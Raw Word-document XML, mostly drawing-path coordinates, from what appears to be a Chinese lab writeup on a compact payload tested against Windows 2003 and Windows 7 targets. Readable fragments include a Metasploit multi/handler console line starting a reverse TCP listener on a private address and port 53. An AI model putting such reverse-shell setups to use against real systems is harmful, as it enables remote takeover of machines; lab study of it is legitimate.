1,1510,15091,1510,15091,1510,15091,1510,15091,1510,15091,1510,15090,1510,15090,1510,15090,1510,15090,1510,15089,1510,15089,1510,15089,1510,15088,1510,15088,1510,15088,1510,15087,1510,15087,1510,15086,1510,15085,1510,15085,1510,15084,1510,15083,1510,15083,1510,15082,1510,15081,1510,15080,1510,15079,1510,15078,1510,15077,1510,15076,1510,15074,1510,15073,1510,15072,1510,15071,1510,15069,1510,15068,1510,15066,1510,15064,1510,15063,1510,15061,1510,15059,1510,15057,1510,15055,1510,15053,1510,15051,1510,15049,1510,15046,1510,15044,1510,15042,1510,15039,1510,15036,1510,15034,1510,15031,1510,15028,1510,15025,1510,15022,1510,15019,1510,15016,1510,15012,1510,15009,1510,15005,1510,15002,1510,14998,1510,14994,1510,14990,1510,14986,1510,14982,1510,14977,1510,14973,1510,14969,1510,14964,1510,14959,1510,14954,1510,14949,1510,14944,1510,14939,1510,14934,1510,14928,1510,14923,1510,14917,1510,14911,1510,14905,1510,14899,1510,14893,1510,14887,1510,14880,1510,14874,1510,14867,1510,14860,1510,14853,1510,14846,1510,14839,1510,14831,1510,14824,1510,14816,1510,14808,1510,14800,1510,14792,1510,14783,1510,14775,1510,14766,1510,14758,1510,14749,1510,14739,1510,14730,1510,14721,1510,14711,1510,14701e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:734.400pt;width:445.800pt;height:19.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId36" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:753.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15070" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:15070;width:8990;height:350" coordorigin="1490,15070" coordsize="8990,350" path="m1510,15092l1510,15092,1510,15092,1510,15092,1510,15092,1510,15092,1510,15092,1511,15092,1512,15092,1512,15092,1514,15092,1515,15092,1517,15092,1519,15092,1521,15092,1524,15092,1528,15092,1532,15092,1536,15092,1541,15092,1546,15092,1552,15092,1559,15092,1566,15092,1575,15092,1583,15092,1593,15092,1603,15092,1615,15092,1627,15092,1640,15092,1654,15092,1668,15092,1684,15092,1701,15092,1719,15092,1738,15092,1758,15092,1780,15092,1802,15092,1826,15092,1851,15092,1877,15092,1904,15092,1933,15092,1963,15092,1995,15092,2028,15092,2063,15092,2099,15092,2136,15092,2175,15092,2216,15092,2259,15092,2303,15092,2348,15092,2396,15092,2445,15092,2496,15092,2549,15092,2604,15092,2660,15092,2719,15092,2779,15092,2841,15092,2906,15092,2972,15092,3041,15092,3112,15092,3184,15092,3259,15092,3336,15092,3416,15092,3498,15092,3582,15092,3668,15092,3757,15092,3848,15092,3941,15092,4037,15092,4136,15092,4236,15092,4340,15092,4446,15092,4555,15092,4666,15092,4780,15092,4897,15092,5017,15092,5139,15092,5264,15092,5392,15092,5523,15092,5657,15092,5793,15092,5933,15092,6076,15092,6222,15092,6370,15092,6522,15092,6677,15092,6835,15092,6997,15092,7161,15092,7329,15092,7500,15092,7675,15092,7853,15092,8034,15092,8219,15092,8407,15092,8598,15092,8793,15092,8992,15092,9194,15092,9400,15092,9609,15092,9823,15092,10039,15092,10260,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15092,10484,15093,10484,15093,10484,15093,10484,15093,10484,15093,10484,15094,10484,15094,10484,15094,10484,15095,10484,15095,10484,15095,10484,15096,10484,15096,10484,15097,10484,15097,10484,15098,10484,15099,10484,15099,10484,15100,10484,15101,10484,15102,10484,15102,10484,15103,10484,15104,10484,15105,10484,15106,10484,15107,10484,15108,10484,15109,10484,15111,10484,15112,10484,15113,10484,15115,10484,15116,10484,15118,10484,15119,10484,15121,10484,15122,10484,15124,10484,15126,10484,15128,10484,15130,10484,15132,10484,15134,10484,15136,10484,15138,10484,15141,10484,15143,10484,15145,10484,15148,10484,15151,10484,15153,10484,15156,10484,15159,10484,15162,10484,15165,10484,15168,10484,15171,10484,15174,10484,15178,10484,15181,10484,15185,10484,15188,10484,15192,10484,15196,10484,15200,10484,15204,10484,15208,10484,15212,10484,15216,10484,15221,10484,15225,10484,15230,10484,15234,10484,15239,10484,15244,10484,15249,10484,15254,10484,15260,10484,15265,10484,15270,10484,15276,10484,15282,10484,15288,10484,15293,10484,15300,10484,15306,10484,15312,10484,15318,10484,15325,10484,15332,10484,15338,10484,15345,10484,15352,10484,15360,10484,15367,10484,15374,10484,15382,10484,15390,10484,15397,10484,15405,10484,15414,10484,15422,10484,15422,10484,15422,10484,15422,10484,15422,10484,15422,10484,15422,10483,15422,10482,15422,10482,15422,10480,15422,10479,15422,10477,15422,10475,15422,10473,15422,10470,15422,10466,15422,10462,15422,10458,15422,10453,15422,10448,15422,10442,15422,10435,15422,10428,15422,10419,15422,10411,15422,10401,15422,10391,15422,10379,15422,10367,15422,10354,15422,10340,15422,10326,15422,10310,15422,10293,15422,10275,15422,10256,15422,10236,15422,10215,15422,10192,15422,10168,15422,10143,15422,10117,15422,10090,15422,10061,15422,10031,15422,9999,15422,9966,15422,9931,15422,9895,15422,9858,15422,9819,15422,9778,15422,9735,15422,9691,15422,9646,15422,9598,15422,9549,15422,9498,15422,9445,15422,9391,15422,9334,15422,9275,15422,9215,15422,9153,15422,9088,15422,9022,15422,8953,15422,8883,15422,8810,15422,8735,15422,8658,15422,8578,15422,8497,15422,8413,15422,8326,15422,8238,15422,8146,15422,8053,15422,7957,15422,7859,15422,7758,15422,7654,15422,7548,15422,7439,15422,7328,15422,7214,15422,7097,15422,6977,15422,6855,15422,6730,15422,6602,15422,6471,15422,6337,15422,6201,15422,6061,15422,5918,15422,5773,15422,5624,15422,5472,15422,5317,15422,5159,15422,4997,15422,4833,15422,4665,15422,4494,15422,4319,15422,4141,15422,3960,15422,3776,15422,3587,15422,3396,15422,3201,15422,3002,15422,2800,15422,2594,15422,2385,15422,2172,15422,1955,15422,1734,15422,1510,15422,1510,15422,1510,15422,1510,15422,1510,15422,1510,15422,1510,15422,1510,15422,1510,15422,1510,15422,1510,15422,1510,15422,1510,15422,1510,15421,1510,15421,1510,15421,1510,15421,1510,15421,1510,15421,1510,15421,1510,15420,1510,15420,1510,15420,1510,15420,1510,15419,1510,15419,1510,15419,1510,15418,1510,15418,1510,15417,1510,15417,1510,15416,1510,15416,1510,15415,1510,15415,1510,15414,1510,15413,1510,15413,1510,15412,1510,15411,1510,15410,1510,15409,1510,15408,1510,15407,1510,15406,1510,15405,1510,15404,1510,15403,1510,15401,1510,15400,1510,15399,1510,15397,1510,15396,1510,15394,1510,15393,1510,15391,1510,15389,1510,15387,1510,15385,1510,15384,1510,15382,1510,15379,1510,15377,1510,15375,1510,15373,1510,15370,1510,15368,1510,15365,1510,15363,1510,15360,1510,15357,1510,15355,1510,15352,1510,15349,1510,15346,1510,15342,1510,15339,1510,15336,1510,15332,1510,15329,1510,15325,1510,15321,1510,15318,1510,15314,1510,15310,1510,15306,1510,15301,1510,15297,1510,15293,1510,15288,1510,15284,1510,15279,1510,15274,1510,15269,1510,15264,1510,15259,1510,15254,1510,15248,1510,15243,1510,15237,1510,15232,1510,15226,1510,15220,1510,15214,1510,15208,1510,15201,1510,15195,1510,15188,1510,15182,1510,15175,1510,15168,1510,15161,1510,15154,1510,15147,1510,15139,1510,15131,1510,15124,1510,15116,1510,15108,1510,15100,1510,15092e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:753.500pt;width:1.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15070" coordsize="30,350">
        <v:shape style="position:absolute;left:1490;top:15070;width:30;height:350" coordorigin="1490,15070" coordsize="30,350" path="m1517,15092l1517,15092,1517,15092,1517,15092,1517,15092,1517,15092,1517,15092,1517,15092,1517,15092,1517,15092,1517,15092,1517,15092,1517,15092,1517,15092,1517,15092,1517,15092,1517,15092,1517,15092,1517,15093,1517,15093,1517,15093,1517,15093,1517,15093,1517,15094,1517,15094,1517,15094,1517,15095,1517,15095,1517,15095,1517,15096,1517,15096,1517,15097,1517,15097,1517,15098,1517,15099,1517,15099,1517,15100,1517,15101,1517,15102,1517,15102,1517,15103,1517,15104,1517,15105,1517,15106,1517,15107,1517,15108,1517,15109,1517,15111,1517,15112,1517,15113,1517,15115,1517,15116,1517,15118,1517,15119,1517,15121,1517,15122,1517,15124,1517,15126,1517,15128,1517,15130,1517,15132,1517,15134,1517,15136,1517,15138,1517,15141,1517,15143,1517,15145,1517,15148,1517,15151,1517,15153,1517,15156,1517,15159,1517,15162,1517,15165,1517,15168,1517,15171,1517,15174,1517,15178,1517,15181,1517,15185,1517,15188,1517,15192,1517,15196,1517,15200,1517,15204,1517,15208,1517,15212,1517,15216,1517,15221,1517,15225,1517,15230,1517,15234,1517,15239,1517,15244,1517,15249,1517,15254,1517,15260,1517,15265,1517,15270,1517,15276,1517,15282,1517,15288,1517,15293,1517,15300,1517,15306,1517,15312,1517,15318,1517,15325,1517,15332,1517,15338,1517,15345,1517,15352,1517,15360,1517,15367,1517,15374,1517,15382,1517,15390,1517,15397,1517,15405,1517,15414,1517,15422e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:770.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15410" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:15410;width:8990;height:370" coordorigin="1490,15410" coordsize="8990,370" path="m1510,15422l1510,15422,1510,15422,1510,15422,1510,15422,1510,15422,1510,15422,1511,15422,1512,15422,1512,15422,1514,15422,1515,15422,1517,15422,1519,15422,1521,15422,1524,15422,1528,15422,1532,15422,1536,15422,1541,15422,1546,15422,1552,15422,1559,15422,1566,15422,1575,15422,1583,15422,1593,15422,1603,15422,1615,15422,1627,15422,1640,15422,1654,15422,1668,15422,1684,15422,1701,15422,1719,15422,1738,15422,1758,15422,1780,15422,1802,15422,1826,15422,1851,15422,1877,15422,1904,15422,1933,15422,1963,15422,1995,15422,2028,15422,2063,15422,2099,15422,2136,15422,2175,15422,2216,15422,2259,15422,2303,15422,2348,15422,2396,15422,2445,15422,2496,15422,2549,15422,2604,15422,2660,15422,2719,15422,2779,15422,2841,15422,2906,15422,2972,15422,3041,15422,3112,15422,3184,15422,3259,15422,3336,15422,3416,15422,3498,15422,3582,15422,3668,15422,3757,15422,3848,15422,3941,15422,4037,15422,4136,15422,4236,15422,4340,15422,4446,15422,4555,15422,4666,15422,4780,15422,4897,15422,5017,15422,5139,15422,5264,15422,5392,15422,5523,15422,5657,15422,5793,15422,5933,15422,6076,15422,6222,15422,6370,15422,6522,15422,6677,15422,6835,15422,6997,15422,7161,15422,7329,15422,7500,15422,7675,15422,7853,15422,8034,15422,8219,15422,8407,15422,8598,15422,8793,15422,8992,15422,9194,15422,9400,15422,9609,15422,9823,15422,10039,15422,10260,15422,10484,15422,10484,15422,10484,15422,10484,15422,10484,15422,10484,15422,10484,15422,10484,15422,10484,15422,10484,15422,10484,15422,10484,15422,10484,15422,10484,15422,10484,15422,10484,15422,10484,15423,10484,15423,10484,15423,10484,15423,10484,15423,10484,15424,10484,15424,10484,15424,10484,15424,10484,15425,10484,15425,10484,15426,10484,15426,10484,15427,10484,15427,10484,15428,10484,15428,10484,15429,10484,15430,10484,15431,10484,15431,10484,15432,10484,15433,10484,15434,10484,15435,10484,15436,10484,15437,10484,15438,10484,15439,10484,15441,10484,15442,10484,15443,10484,15445,10484,15446,10484,15448,10484,15450,10484,15451,10484,15453,10484,15455,10484,15457,10484,15459,10484,15461,10484,15463,10484,15465,10484,15467,10484,15470,10484,15472,10484,15475,10484,15477,10484,15480,10484,15483,10484,15486,10484,15489,10484,15492,10484,15495,10484,15498,10484,15501,10484,15505,10484,15508,10484,15512,10484,15516,10484,15520,10484,15523,10484,15527,10484,15532,10484,15536,10484,15540,10484,15545,10484,15549,10484,15554,10484,15559,10484,15563,10484,15568,10484,15573,10484,15579,10484,15584,10484,15590,10484,15595,10484,15601,10484,15607,10484,15613,10484,15619,10484,15625,10484,15631,10484,15638,10484,15644,10484,15651,10484,15658,10484,15665,10484,15672,10484,15680,10484,15687,10484,15695,10484,15702,10484,15710,10484,15718,10484,15726,10484,15735,10484,15743,10484,15752,10484,15760,10484,15769,10484,15778,10484,15788,10484,15797,10484,15797,10484,15797,10484,15797,10484,15797,10484,15797,10484,15797,10483,15797,10482,15797,10482,15797,10480,15797,10479,15797,10477,15797,10475,15797,10473,15797,10470,15797,10466,15797,10462,15797,10458,15797,10453,15797,10448,15797,10442,15797,10435,15797,10428,15797,10419,15797,10411,15797,10401,15797,10391,15797,10379,15797,10367,15797,10354,15797,10340,15797,10326,15797,10310,15797,10293,15797,10275,15797,10256,15797,10236,15797,10215,15797,10192,15797,10168,15797,10143,15797,10117,15797,10090,15797,10061,15797,10031,15797,9999,15797,9966,15797,9931,15797,9895,15797,9858,15797,9819,15797,9778,15797,9735,15797,9691,15797,9646,15797,9598,15797,9549,15797,9498,15797,9445,15797,9391,15797,9334,15797,9275,15797,9215,15797,9153,15797,9088,15797,9022,15797,8953,15797,8883,15797,8810,15797,8735,15797,8658,15797,8578,15797,8497,15797,8413,15797,8326,15797,8238,15797,8146,15797,8053,15797,7957,15797,7859,15797,7758,15797,7654,15797,7548,15797,7439,15797,7328,15797,7214,15797,7097,15797,6977,15797,6855,15797,6730,15797,6602,15797,6471,15797,6337,15797,6201,15797,6061,15797,5918,15797,5773,15797,5624,15797,5472,15797,5317,15797,5159,15797,4997,15797,4833,15797,4665,15797,4494,15797,4319,15797,4141,15797,3960,15797,3776,15797,3587,15797,3396,15797,3201,15797,3002,15797,2800,15797,2594,15797,2385,15797,2172,15797,1955,15797,1734,15797,1510,15797,1510,15797,1510,15797,1510,15797,1510,15797,1510,15797,1510,15797,1510,15797,1510,15797,1510,15797,1510,15797,1510,15797,1510,15797,1510,15797,1510,15796,1510,15796,1510,15796,1510,15796,1510,15796,1510,15796,1510,15795,1510,15795,1510,15795,1510,15795,1510,15794,1510,15794,1510,15793,1510,15793,1510,15793,1510,15792,1510,15792,1510,15791,1510,15790,1510,15790,1510,15789,1510,15788,1510,15787,1510,15787,1510,15786,1510,15785,1510,15784,1510,15783,1510,15782,1510,15780,1510,15779,1510,15778,1510,15777,1510,15775,1510,15774,1510,15772,1510,15771,1510,15769,1510,15767,1510,15766,1510,15764,1510,15762,1510,15760,1510,15758,1510,15756,1510,15754,1510,15751,1510,15749,1510,15746,1510,15744,1510,15741,1510,15739,1510,15736,1510,15733,1510,15730,1510,15727,1510,15724,1510,15721,1510,15717,1510,15714,1510,15710,1510,15707,1510,15703,1510,15699,1510,15695,1510,15691,1510,15687,1510,15683,1510,15679,1510,15674,1510,15670,1510,15665,1510,15660,1510,15655,1510,15650,1510,15645,1510,15640,1510,15635,1510,15629,1510,15624,1510,15618,1510,15612,1510,15606,1510,15600,1510,15594,1510,15587,1510,15581,1510,15574,1510,15568,1510,15561,1510,15554,1510,15547,1510,15539,1510,15532,1510,15524,1510,15516,1510,15509,1510,15501,1510,15492,1510,15484,1510,15476,1510,15467,1510,15458,1510,15449,1510,15440,1510,15431,1510,15422e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:770.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15410" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:15410;width:30;height:390" coordorigin="1490,15410" coordsize="30,390" path="m1517,15422l1517,15422,1517,15422,1517,15422,1517,15422,1517,15422,1517,15422,1517,15422,1517,15422,1517,15422,1517,15422,1517,15422,1517,15422,1517,15422,1517,15422,1517,15422,1517,15423,1517,15423,1517,15423,1517,15423,1517,15423,1517,15424,1517,15424,1517,15424,1517,15424,1517,15425,1517,15425,1517,15426,1517,15426,1517,15427,1517,15427,1517,15428,1517,15428,1517,15429,1517,15430,1517,15431,1517,15431,1517,15432,1517,15433,1517,15434,1517,15435,1517,15436,1517,15437,1517,15438,1517,15439,1517,15441,1517,15442,1517,15443,1517,15445,1517,15446,1517,15448,1517,15450,1517,15451,1517,15453,1517,15455,1517,15457,1517,15459,1517,15461,1517,15463,1517,15465,1517,15467,1517,15470,1517,15472,1517,15475,1517,15477,1517,15480,1517,15483,1517,15486,1517,15489,1517,15492,1517,15495,1517,15498,1517,15501,1517,15505,1517,15508,1517,15512,1517,15516,1517,15520,1517,15523,1517,15527,1517,15532,1517,15536,1517,15540,1517,15545,1517,15549,1517,15554,1517,15559,1517,15563,1517,15568,1517,15573,1517,15579,1517,15584,1517,15590,1517,15595,1517,15601,1517,15607,1517,15613,1517,15619,1517,15625,1517,15631,1517,15638,1517,15644,1517,15651,1517,15658,1517,15665,1517,15672,1517,15680,1517,15687,1517,15695,1517,15702,1517,15710,1517,15718,1517,15726,1517,15735,1517,15743,1517,15752,1517,15760,1517,15769,1517,15778,1517,15788,1517,15797e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:355.800pt;height:323.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId37" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:432.600pt;width:266.399pt;height:69.599pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId38" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:563.400pt;width:334.800pt;height:39.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId39" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:621.600pt;width:467.400pt;height:93.599pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId40" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:772.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,15450" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:15450;width:130;height:270" coordorigin="2070,15450" coordsize="130,270" path="m2095,15467l2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2096,15467,2096,15467,2096,15467,2096,15467,2096,15467,2096,15467,2096,15467,2096,15467,2096,15467,2097,15467,2097,15467,2097,15467,2097,15467,2097,15467,2098,15467,2098,15467,2098,15467,2098,15467,2099,15467,2099,15467,2099,15467,2100,15467,2100,15467,2100,15467,2101,15467,2101,15467,2102,15467,2102,15467,2102,15467,2103,15467,2103,15467,2104,15467,2105,15467,2105,15467,2106,15467,2106,15467,2107,15467,2108,15467,2108,15467,2109,15467,2110,15467,2110,15467,2111,15467,2112,15467,2113,15467,2114,15467,2115,15467,2116,15467,2116,15467,2117,15467,2118,15467,2119,15467,2121,15467,2122,15467,2123,15467,2124,15467,2125,15467,2126,15467,2128,15467,2129,15467,2130,15467,2132,15467,2133,15467,2134,15467,2136,15467,2137,15467,2139,15467,2140,15467,2142,15467,2144,15467,2145,15467,2147,15467,2149,15467,2151,15467,2152,15467,2154,15467,2156,15467,2158,15467,2160,15467,2162,15467,2164,15467,2166,15467,2168,15467,2171,15467,2173,15467,2175,15467,2178,15467,2180,15467,2182,15467,2185,15467,2187,15467,2190,15467,2192,15467,2195,15467,2198,15467,2201,15467,2203,15467,2206,15467,2209,15467,2212,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15468,2215,15468,2215,15468,2215,15468,2215,15468,2215,15468,2215,15469,2215,15469,2215,15469,2215,15469,2215,15470,2215,15470,2215,15470,2215,15471,2215,15471,2215,15472,2215,15472,2215,15473,2215,15473,2215,15474,2215,15474,2215,15475,2215,15476,2215,15476,2215,15477,2215,15478,2215,15479,2215,15480,2215,15481,2215,15482,2215,15483,2215,15484,2215,15485,2215,15486,2215,15487,2215,15488,2215,15489,2215,15491,2215,15492,2215,15493,2215,15495,2215,15496,2215,15498,2215,15499,2215,15501,2215,15503,2215,15505,2215,15506,2215,15508,2215,15510,2215,15512,2215,15514,2215,15517,2215,15519,2215,15521,2215,15523,2215,15526,2215,15528,2215,15531,2215,15533,2215,15536,2215,15539,2215,15541,2215,15544,2215,15547,2215,15550,2215,15553,2215,15557,2215,15560,2215,15563,2215,15566,2215,15570,2215,15574,2215,15577,2215,15581,2215,15585,2215,15589,2215,15593,2215,15597,2215,15601,2215,15605,2215,15609,2215,15614,2215,15618,2215,15623,2215,15627,2215,15632,2215,15637,2215,15642,2215,15647,2215,15652,2215,15658,2215,15663,2215,15668,2215,15674,2215,15679,2215,15685,2215,15691,2215,15697,2215,15703,2215,15709,2215,15716,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2215,15722,2214,15722,2214,15722,2214,15722,2214,15722,2214,15722,2214,15722,2214,15722,2214,15722,2213,15722,2213,15722,2213,15722,2213,15722,2213,15722,2212,15722,2212,15722,2212,15722,2212,15722,2211,15722,2211,15722,2211,15722,2210,15722,2210,15722,2209,15722,2209,15722,2209,15722,2208,15722,2208,15722,2207,15722,2207,15722,2206,15722,2206,15722,2205,15722,2205,15722,2204,15722,2203,15722,2203,15722,2202,15722,2201,15722,2200,15722,2200,15722,2199,15722,2198,15722,2197,15722,2196,15722,2196,15722,2195,15722,2194,15722,2193,15722,2192,15722,2191,15722,2190,15722,2189,15722,2187,15722,2186,15722,2185,15722,2184,15722,2183,15722,2181,15722,2180,15722,2179,15722,2177,15722,2176,15722,2174,15722,2173,15722,2171,15722,2170,15722,2168,15722,2167,15722,2165,15722,2163,15722,2161,15722,2160,15722,2158,15722,2156,15722,2154,15722,2152,15722,2150,15722,2148,15722,2146,15722,2144,15722,2142,15722,2140,15722,2137,15722,2135,15722,2133,15722,2130,15722,2128,15722,2125,15722,2123,15722,2120,15722,2118,15722,2115,15722,2112,15722,2110,15722,2107,15722,2104,15722,2101,15722,2098,15722,2095,15722,2095,15722,2095,15722,2095,15722,2095,15722,2095,15722,2095,15722,2095,15722,2095,15722,2095,15722,2095,15722,2095,15722,2095,15722,2095,15722,2095,15722,2095,15722,2095,15721,2095,15721,2095,15721,2095,15721,2095,15721,2095,15721,2095,15721,2095,15720,2095,15720,2095,15720,2095,15720,2095,15719,2095,15719,2095,15719,2095,15718,2095,15718,2095,15717,2095,15717,2095,15716,2095,15716,2095,15715,2095,15715,2095,15714,2095,15714,2095,15713,2095,15712,2095,15711,2095,15711,2095,15710,2095,15709,2095,15708,2095,15707,2095,15706,2095,15705,2095,15704,2095,15703,2095,15702,2095,15701,2095,15699,2095,15698,2095,15697,2095,15695,2095,15694,2095,15692,2095,15691,2095,15689,2095,15688,2095,15686,2095,15684,2095,15682,2095,15680,2095,15678,2095,15676,2095,15674,2095,15672,2095,15670,2095,15668,2095,15665,2095,15663,2095,15661,2095,15658,2095,15655,2095,15653,2095,15650,2095,15647,2095,15644,2095,15641,2095,15638,2095,15635,2095,15632,2095,15629,2095,15626,2095,15622,2095,15619,2095,15615,2095,15612,2095,15608,2095,15604,2095,15600,2095,15596,2095,15592,2095,15588,2095,15584,2095,15579,2095,15575,2095,15571,2095,15566,2095,15561,2095,15556,2095,15552,2095,15547,2095,15542,2095,15536,2095,15531,2095,15526,2095,15520,2095,15515,2095,15509,2095,15503,2095,15498,2095,15492,2095,15486,2095,15479,2095,15473,2095,15467e x" fillcolor="#fefefe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87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6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayload大小如下：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3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174字节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57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3189" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第三次靶机测试：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分别测试Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="7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2003，Windws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> 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7，reverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> 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OK。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并且最终编译运行库依然为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/MT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71" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5511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1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msf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exploit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multi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler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)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exploit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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13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3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Started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reverse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TCP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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler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7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>on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192.168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.1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.5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53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group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:278.865pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,5577">
